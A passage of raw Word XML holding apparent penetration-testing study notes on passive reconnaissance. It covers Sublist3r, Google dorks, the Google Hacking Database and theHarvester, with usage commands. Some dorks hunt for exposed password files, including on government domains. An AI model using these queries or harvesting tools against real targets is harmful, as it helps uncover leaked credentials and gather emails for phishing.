    </w:p>
    <w:p w14:paraId="13C657C8" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B224CFA" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A17A1A7" w14:textId="77777777" w:rsidR="006C1146" w:rsidRPr="002A77BD" w:rsidRDefault="006C1146" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="796C9DC5" w14:textId="77777777" w:rsidR="006C1146" w:rsidRPr="002A77BD" w:rsidRDefault="006C1146" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DEFEAF0" w14:textId="4A3023A5" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sub</w:t>
      </w:r>
      <w:r w:rsidR="004C4233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ist3r – Subdomain Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6814C40A" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FB19F14" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Looking for subdomains that might have been indexed by search engines (Google, Bing, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C30AE3C" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52992A42" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F7067C" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Python tool used to enumerate websites using OSINT, used to gather/enumerate subdomains for the domain we are targeting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C09B17" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Utilizes different recon tools such as Netcraft, VirusTotal, DNSDumpster, ReverseDNS, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530A853D" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Github repo, available in Kali repos, supports bruteforce but that is active recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A664BA" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B731F2A" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="591AA693" w14:textId="148A9D09" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Contains a help page on the Github repo for Sublist3r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E097ABA" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E754CC3" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Not guaranteed 100% success every time, will attempt to search to try and see if a subdomain was indexed previously (that might be hidden now, but still accessible).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250EBC3E" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Automated process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4158637A" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“sublist3r -d “DOMAIN” -e “SEARCH ENGINE” (google,yahoo,bing,etc) -o “text file output path”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ED07B3" w14:textId="77777777" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Might need a VPN if a search engine is blocking requests from this utility tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F88E88" w14:textId="7E4D49B2" w:rsidR="00344E70" w:rsidRPr="002A77BD" w:rsidRDefault="00344E70" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-t” to limit the number of threads utilized, mainly used for the brute force attack (active recon)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1AFEDD" w14:textId="77777777" w:rsidR="006C1146" w:rsidRPr="002A77BD" w:rsidRDefault="006C1146" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76F20A82" w14:textId="6DA88946" w:rsidR="006C1146" w:rsidRPr="002A77BD" w:rsidRDefault="006C1146" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Google Dorks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE972CF" w14:textId="1C3C4EFF" w:rsidR="006C1146" w:rsidRPr="002A77BD" w:rsidRDefault="00420090" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="006C1146" w:rsidRPr="002A77BD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://gist.github.com/sundowndev/283efaddbcf896ab405488330d1bbc06</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="27C34B81" w14:textId="0EE69B31" w:rsidR="006C1146" w:rsidRPr="002A77BD" w:rsidRDefault="006C1146" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“site:ine.com inurl:admin”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05910FAC" w14:textId="3FC5B017" w:rsidR="006C1146" w:rsidRPr="002A77BD" w:rsidRDefault="006C1146" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“site:*.ine.com”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B418BC" w14:textId="031519B3" w:rsidR="006C1146" w:rsidRPr="002A77BD" w:rsidRDefault="006C1146" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“site:*.ine.com intitle:admin”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B34C33E" w14:textId="551EBF18" w:rsidR="006C1146" w:rsidRPr="002A77BD" w:rsidRDefault="006C1146" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“site:*.ine.com filetype:pdf”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC19CDF" w14:textId="335B74E3" w:rsidR="00AA1C9F" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1C9F" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“intitle:index of” (Directory listing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500FE3D7" w14:textId="78F2B63A" w:rsidR="00AA1C9F" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1C9F" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“cache: ine.com</w:t>
      </w:r>
      <w:r w:rsidR="00D26562" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F71025" w14:textId="0502BC30" w:rsidR="00D26562" w:rsidRPr="002A77BD" w:rsidRDefault="00D26562" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“inurl:password.txt” “inurl:robots.txt”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1A6BFF" w14:textId="77777777" w:rsidR="00AA1C9F" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1C9F" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61927AF5" w14:textId="197E1B1C" w:rsidR="00AA1C9F" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1C9F" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Wayback Machine – View earlier versions of a website for a historical view of the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357B3301" w14:textId="5F5558F9" w:rsidR="00AA1C9F" w:rsidRPr="002A77BD" w:rsidRDefault="00D26562" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>GHDB – Google Hacking Database (exploit-db)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7473192A" w14:textId="279D0BE8" w:rsidR="00D26562" w:rsidRPr="002A77BD" w:rsidRDefault="00D26562" w:rsidP="00D26562">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Contains a multitude of Google Dork parameters that can be used for information gathering on Google.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AC9492" w14:textId="28151394" w:rsidR="00D26562" w:rsidRPr="002A77BD" w:rsidRDefault="00D26562" w:rsidP="00D26562">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“site:gov.* intitle:”index of” *.csv passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1BFD44" w14:textId="77777777" w:rsidR="00D26562" w:rsidRPr="002A77BD" w:rsidRDefault="00D26562" w:rsidP="00D26562">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0966F44F" w14:textId="4B6BDAEC" w:rsidR="00D26562" w:rsidRPr="002A77BD" w:rsidRDefault="00D26562" w:rsidP="00D26562">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Can look up Google Dork search </w:t>
      </w:r>
      <w:r w:rsidR="0009076B" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC2AC99" w14:textId="77777777" w:rsidR="00AA1642" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1642" w:rsidP="00AA1642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5969A781" w14:textId="77777777" w:rsidR="00AA1C9F" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1C9F" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73F724EC" w14:textId="53DC624A" w:rsidR="00165019" w:rsidRPr="002A77BD" w:rsidRDefault="00165019" w:rsidP="00344E70">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Email Harvesting – theHarvester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E05F11" w14:textId="37836637" w:rsidR="00165019" w:rsidRPr="002A77BD" w:rsidRDefault="00165019" w:rsidP="00165019">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Harvest emails that may have potentially been leaked and visible </w:t>
      </w:r>
      <w:r w:rsidR="0009076B" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>online.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8E57EE" w14:textId="5142D37F" w:rsidR="00165019" w:rsidRPr="002A77BD" w:rsidRDefault="00165019" w:rsidP="00165019">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Github repo, installable Linux package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178E0E5B" w14:textId="3CDB6EA0" w:rsidR="00D91326" w:rsidRPr="002A77BD" w:rsidRDefault="00420090" w:rsidP="00165019">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00AA1642" w:rsidRPr="002A77BD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://github</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D91326" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.com/laramies/theHarvester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468D9B94" w14:textId="77777777" w:rsidR="00165019" w:rsidRPr="002A77BD" w:rsidRDefault="00165019" w:rsidP="00165019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4658713D" w14:textId="65074E9C" w:rsidR="00165019" w:rsidRPr="002A77BD" w:rsidRDefault="00165019" w:rsidP="00165019">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The Harvestor is an effective tool uses OSINT gathering to help determine a company’s external threat landscape on the </w:t>
      </w:r>
      <w:r w:rsidR="0009076B" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492FB608" w14:textId="77777777" w:rsidR="00AA1642" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1642" w:rsidP="00AA1642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68CE5E9D" w14:textId="77777777" w:rsidR="00165019" w:rsidRPr="002A77BD" w:rsidRDefault="00165019" w:rsidP="00165019">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="456FB061" w14:textId="1AE64AFD" w:rsidR="00165019" w:rsidRPr="002A77BD" w:rsidRDefault="00165019" w:rsidP="00165019">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The tool gathers emails, names, subdomains, Ips and URLs using multiple public data </w:t>
      </w:r>
      <w:r w:rsidR="0009076B" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46673CCE" w14:textId="77777777" w:rsidR="00AA1642" w:rsidRPr="002A77BD" w:rsidRDefault="00AA1642" w:rsidP="00AA1642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="655D93E8" w14:textId="77777777" w:rsidR="00165019" w:rsidRPr="002A77BD" w:rsidRDefault="00165019" w:rsidP="00165019">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4085BAD7" w14:textId="634CC60B" w:rsidR="00165019" w:rsidRPr="002A77BD" w:rsidRDefault="00165019" w:rsidP="00165019">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“theHarvester -d hackersploit.org -b google,linkedin”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A492BF4" w14:textId="3FE81131" w:rsidR="00D91326" w:rsidRPr="002A77BD" w:rsidRDefault="00D91326" w:rsidP="00165019">
      <w:pPr>
        <w:rPr>
